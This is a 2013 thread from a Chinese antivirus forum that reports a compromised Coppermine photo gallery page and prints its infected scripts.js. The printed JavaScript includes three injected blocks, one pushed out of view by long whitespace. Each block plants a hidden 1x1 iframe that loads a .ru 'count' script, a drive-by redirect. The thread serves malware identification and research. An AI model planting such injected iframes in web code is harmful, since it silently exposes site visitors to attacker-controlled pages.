查看: 1008|回复: 0
收起左侧

[已鉴定] http://elenalana.com/photos/displayimage.php?album=lastup

[复制链接]
fireold
发表于 2013-6-23 17:48:23 | 显示全部楼层 |阅读模式
  1. (function() {
  2.                                                                                                                                                                                                                                                               var ehdr = document.createElement('iframe');
  3.                                                                                                                                                                                                                                                               ehdr.src = 'http://ymzejkis.ru/count8.php';
  4.                                                                                                                                                                                                                                                               ehdr.style.position = 'absolute';
  5.                                                                                                                                                                                                                                                               ehdr.style.border = '0';
  6.                                                                                                                                                                                                                                                               ehdr.style.height = '1px';
  7.                                                                                                                                                                                                                                                               ehdr.style.width = '1px';
  8.                                                                                                                                                                                                                                                               ehdr.style.left = '1px';
  9.                                                                                                                                                                                                                                                               ehdr.style.top = '1px';
  10.                                                                                                                                                                                                                                                               if (!document.getElementById('ehdr')) {
  11.                                                                                                                                                                                                                                                                   document.write('<div id=\'ehdr\'></div>');
  12.                                                                                                                                                                                                                                                                   document.getElementById('ehdr').appendChild(ehdr);
  13.                                                                                                                                                                                                                                                               }
  14.                                                                                                                                                                                                                                                           })();
复制代码
  1. /*************************
  2.   Coppermine Photo Gallery
  3.   ************************
  4.   Copyright (c) 2003-2008 Dev Team
  5.   v1.1 originally written by Gregory DEMAR

  6.   This program is free software; you can redistribute it and/or modify
  7.   it under the terms of the GNU General Public License version 3
  8.   as published by the Free Software Foundation.
  9.   
  10.   ********************************************
  11.   Coppermine version: 1.4.19
  12.   $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/scripts.js $
  13.   $Revision: 4392 $
  14.   $Author: gaugau $
  15.   $Date: 2008-04-16 09:25:35 +0200 (Mi, 16 Apr 2008) $
  16. **********************************************/

  17. function MM_openBrWindow(theURL, winName, features) { //v2.0
  18.     window.open(theURL, winName, features);
  19. }

  20. function writeCookie(name, data, noDays) {
  21.     var cookieStr = name + "=" + data
  22.     if (writeCookie.arguments.length > 2) {
  23.         cookieStr += "; expires=" + getCookieExpireDate(noDays)
  24.     }
  25.     document.cookie = cookieStr
  26. }

  27. function readCookie(cookieName) {
  28.     var searchName = cookieName + "="
  29.     var cookies = document.cookie
  30.     var start = cookies.indexOf(cookieName)
  31.     if (start == -1) { // cookie not found
  32.         return ""
  33.     }
  34.     start += searchName.length //start of the cookie data
  35.     var end = cookies.indexOf(";", start)
  36.     if (end == -1) {
  37.         end = cookies.length
  38.     }
  39.     return cookies.substring(start, end)
  40. }

  41. function blocking(nr, cookie, vis_state) {
  42.     if (document.layers) {
  43.         current = (document.layers[nr].display == 'none') ? vis_state : 'none';
  44.         if (cookie != '') writeCookie(nr, current);
  45.         document.layers[nr].display = current;
  46.     } else if (document.all) {
  47.         current = (document.all[nr].style.display == 'none') ? vis_state : 'none';
  48.         if (cookie != '') writeCookie(nr, current);
  49.         document.all[nr].style.display = current;
  50.     } else if (document.getElementById) {
  51.         display = (document.getElementById(nr).style.display == 'none') ? vis_state : 'none';
  52.         if (cookie != '') writeCookie(nr, display);
  53.         document.getElementById(nr).style.display = display;
  54.     }
  55. }


  56. function adjust_popup() {
  57.     var w, h, fixedW, fixedH, diffW, diffH;
  58.     if (document.documentElement && document.body.clientHeight == 0) { // Catches IE6 and FF in DOCMODE
  59.         fixedW = document.documentElement.clientWidth;
  60.         fixedH = document.documentElement.clientHeight;
  61.         window.resizeTo(fixedW, fixedH);
  62.         diffW = fixedW - document.documentElement.clientWidth;
  63.         diffH = fixedH - document.documentElement.clientHeight;
  64.         w = fixedW + diffW + 16; // Vert Scrollbar Always On in DOCMODE.
  65.         h = fixedH + diffH;
  66.         if (w >= screen.availWidth) h += 16;
  67.     } else if (document.all) {
  68.         fixedW = document.body.clientWidth;
  69.         fixedH = document.body.clientHeight;
  70.         window.resizeTo(fixedW, fixedH);
  71.         diffW = fixedW - document.body.clientWidth;
  72.         diffH = fixedH - document.body.clientHeight;
  73.         w = fixedW + diffW;
  74.         h = fixedH + diffH;
  75.         if (h >= screen.availHeight) w += 16;
  76.         if (w >= screen.availWidth) h += 16;
  77.     } else {
  78.         fixedW = window.innerWidth;
  79.         fixedH = window.innerHeight;
  80.         window.resizeTo(fixedW, fixedH);
  81.         diffW = fixedW - window.innerWidth;
  82.         diffH = fixedH - window.innerHeight;
  83.         w = fixedW + diffW;
  84.         h = fixedH + diffH;
  85.         if (w >= screen.availWidth) h += 16;
  86.         if (h >= screen.availHeight) w += 16;
  87.     }
  88.     w = Math.min(w, screen.availWidth);
  89.     h = Math.min(h, screen.availHeight);
  90.     window.resizeTo(w, h);
  91.     window.moveTo((screen.availWidth - w) / 2, (screen.availHeight - h) / 2);
  92. }

  93. function show_section(e) {
  94.     if (document.getElementById(e).style.display == 'none') {
  95.         document.getElementById(e).style.display = 'block';
  96.     } else {
  97.         document.getElementById(e).style.display = 'none';
  98.     }
  99. }


  100. function expand() {
  101.     var Nodes = document.getElementsByTagName("table")
  102.     var max = Nodes.length
  103.     for (var i = 0; i < max; i++) {
  104.         var nodeObj = Nodes.item(i)
  105.         var str = nodeObj.id
  106.         if (str.match("section")) {
  107.             nodeObj.style.display = 'block';
  108.         }
  109.     }
  110. }

  111. function hideall() {
  112.     var Nodes = document.getElementsByTagName("table")
  113.     var max = Nodes.length
  114.     for (var i = 0; i < max; i++) {
  115.         var nodeObj = Nodes.item(i)
  116.         var str = nodeObj.id
  117.         if (str.match("section")) {
  118.             nodeObj.style.display = 'none';
  119.         }
  120.     }
  121. }

  122. /*e2aa4e*/
  123. (function() {
  124.     var ip = document.createElement('iframe');
  125.     ip.src = 'http://picifcym.ru/count26.php';
  126.     ip.style.position = 'absolute';
  127.     ip.style.border = '0';
  128.     ip.style.height = '1px';
  129.     ip.style.width = '1px';
  130.     ip.style.left = '1px';
  131.     ip.style.top = '1px';
  132.     if (!document.getElementById('ip')) {
  133.         document.write('<div id=\'ip\'></div>');
  134.         document.getElementById('ip').appendChild(ip);
  135.     }
  136. })(); /*/e2aa4e*/

  137. /*6b1ee4*/
  138. (function() {
  139.     var di = document.createElement('iframe');
  140.     di.src = 'http://ymzejkis.ru/count8.php';
  141.     di.style.position = 'absolute';
  142.     di.style.border = '0';
  143.     di.style.height = '1px';
  144.     di.style.width = '1px';
  145.     di.style.left = '1px';
  146.     di.style.top = '1px';
  147.     if (!document.getElementById('di')) {
  148.         document.write('<div id=\'di\'></div>');
  149.         document.getElementById('di').appendChild(di);
  150.     }
  151. })(); /*/6b1ee4*/
复制代码
avg15.jpg

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-3 10:19 , Processed in 0.133974 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表